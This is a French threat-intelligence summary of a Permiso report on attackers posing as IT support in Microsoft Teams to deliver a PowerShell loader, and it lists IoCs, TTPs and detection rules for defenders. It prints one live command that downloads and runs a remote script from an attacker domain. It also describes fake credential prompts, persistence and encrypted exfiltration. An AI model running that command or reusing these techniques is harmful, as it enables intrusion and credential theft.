Selon Permiso (permiso.io), des acteurs menaçants exploitent Microsoft Teams comme vecteur d’ingénierie sociale pour distribuer un payload PowerShell, en se faisant passer pour du support IT afin d’obtenir un accès à distance et déployer des malwares.

Les campagnes observées s’appuient sur des comptes Microsoft Teams nouvellement créés ou compromis, usurpant des rôles de « IT SUPPORT », « Help Desk », etc., parfois agrémentés d’un ✅ dans le nom pour simuler une vérification. Ces identités tirent parti de tenants onmicrosoft.com aux conventions de nommage génériques (admin, engineering, supportbotit). Les cibles sont variées mais basées en régions anglophones. Le contact initial se fait par messages/appels externes sur Teams que l’utilisateur doit autoriser. 💬

Une fois la conversation engagée, les victimes sont guidées vers l’installation d’outils d’accès à distance (notamment Quick Assist ou AnyDesk), permettant à l’acteur de prendre le contrôle de la machine. Des variantes similaires ont été publiquement rattachées à des opérations liées à BlackBasta (avec, selon les cas, déploiement de DarkGate puis plus récemment du loader Matanbuchus). Contrairement à certains scénarios antérieurs, le préchauffage par campagnes e‑mail massives n’est pas systématique ici.

Sur le plan technique, un exemple montre l’exécution de la commande PowerShell suivante :

  • powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command “Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex" Le script multi‑étapes implémente un mutex global (AppId 62088a7b-ae9f-2333-77a-6e9c921cb48e) pour l’instance unique, marque le processus comme critique via RtlSetProcessIsCritical (BSOD si tué), collecte des infos système (IP via ident.me, UUID, Get-ComputerInfo), affiche une invite de type PromptForCredential pour voler des identifiants (enregistrés dans AppData\info.txt), et persiste via une tâche planifiée « Google LLC Updater » ou une clé Run. Il récupère des payloads depuis https://cjhsbam[.]com/payload/runner.ps1, chiffre les échanges C2 en AES (clé et IV en dur) et envoie les données vers un serveur (mentionné comme https://audiorealtek[.]com/) ; les réponses C2 sont décodées puis exécutées comme jobs PowerShell. 🔒

Des « red flags » incluent des constantes AES codées en dur ($iv = “&9*zS7LY%ZN1thfI” et $key = “123456789012345678901234r0hollah”). L’OSINT relie ces artefacts à EncryptHub / LARVA-208, aussi suivi comme Water Gamayun, un groupe financier actif combinant exploitation de 0‑day (dont CVE‑2025‑26633 « MSC EvilTwin ») et malwares sur mesure (SilentPrism, DarkWisp, stealers), avec appâts plausibles (faux services IA, offres d’emploi) visant des profils IT, développeurs et Web3 anglophones. La réutilisation de constantes cryptographiques à travers les campagnes facilite le suivi défensif du tooling.

Couverture Permiso: des détections M365/Teams sont proposées (P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1, P0_M365_TEAMS_CHAT_CREATED_BY_EXTERNAL_USER_1, P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1). L’article est une analyse de menace visant à documenter le mode opératoire, exposer les IoC et aider à la détection.

IOCs (extraits)

  • URL: https://audiorealteak[.]com/payload/build.ps1
  • URL: https://cjhsbam[.]com/payload/runner.ps1
  • IP: 104.21.40[.]219; 193.5.65[.]199
  • User‑Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
  • AES IV: &9*zS7LY%ZN1thfI
  • AES Key: 123456789012345678901234r0hollah
  • Mutex/AppId: 62088a7b-ae9f-2333-77a-6e9c921cb48e
  • Affichages usurpés: “Help Desk Specialist ✅”, “IT SUPPORT✅”, “Marco DaSilva IT Support ✅”, “Help Desk”, etc.
  • UPN externes onmicrosoft.com: @cybersecurityadm, @updateteamis, @supportbotit, @replysupport, @administratoritdep, @luxadmln, @firewalloverview

TTPs clés

  • Ingénierie sociale via Microsoft Teams externe (chat/appel), usurpation de support IT avec symboles ✅ et tenants onmicrosoft.com.
  • Installation/usage d’outils d’accès à distance (Quick Assist, AnyDesk) pour prise de contrôle.
  • Exécution PowerShell furtive: ExecutionPolicy Bypass, WindowsStyle Hidden, Invoke-RestMethod + IEX.
  • Single-instance via mutex; protection processus critique (RtlSetProcessIsCritical) provoquant BSOD à la terminaison.
  • Collecte d’empreinte hôte (ident.me, UUID, Get-ComputerInfo).
  • Vol d’identifiants par invite GUI (PromptForCredential) et exfiltration chiffrée AES vers C2.
  • Persistance: tâche planifiée “Google LLC Updater” ou clé de registre Run; récupération de payloads depuis domaines externes.
  • Orchestration C2 via JSON déchiffré, lancé en jobs PowerShell.

🧠 TTPs et IOCs détectés

TTP

[‘Ingénierie sociale via Microsoft Teams externe (chat/appel), usurpation de support IT avec symboles ✅ et tenants onmicrosoft.com.’, ‘Installation/usage d’outils d’accès à distance (Quick Assist, AnyDesk) pour prise de contrôle.’, ‘Exécution PowerShell furtive: ExecutionPolicy Bypass, WindowsStyle Hidden, Invoke-RestMethod + IEX.’, ‘Single-instance via mutex; protection processus critique (RtlSetProcessIsCritical) provoquant BSOD à la terminaison.’, ‘Collecte d’empreinte hôte (ident.me, UUID, Get-ComputerInfo).’, ‘Vol d’identifiants par invite GUI (PromptForCredential) et exfiltration chiffrée AES vers C2.’, “Persistance: tâche planifiée ‘Google LLC Updater’ ou clé de registre Run; récupération de payloads depuis domaines externes.”, ‘Orchestration C2 via JSON déchiffré, lancé en jobs PowerShell.’]

IOC

{‘url’: [‘https://audiorealteak.com/payload/build.ps1’, ‘https://cjhsbam.com/payload/runner.ps1’], ‘ip’: [‘104.21.40.219’, ‘193.5.65.199’], ‘user_agent’: ‘Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6’, ‘aes_iv’: ‘&9*zS7LY%ZN1thfI’, ‘aes_key’: ‘123456789012345678901234r0hollah’, ‘mutex_appid’: ‘62088a7b-ae9f-2333-77a-6e9c921cb48e’, ‘display_names’: [‘Help Desk Specialist ✅’, ‘IT SUPPORT✅’, ‘Marco DaSilva IT Support ✅’, ‘Help Desk’], ‘upn_externes’: [’@cybersecurityadm’, ‘@updateteamis’, ‘@supportbotit’, ‘@replysupport’, ‘@administratoritdep’, ‘@luxadmln’, ‘@firewalloverview’]}

🔗 Source originale : https://permiso.io/blog/sliding-into-your-dms-abusing-microsoft-teams-for-malware-delivery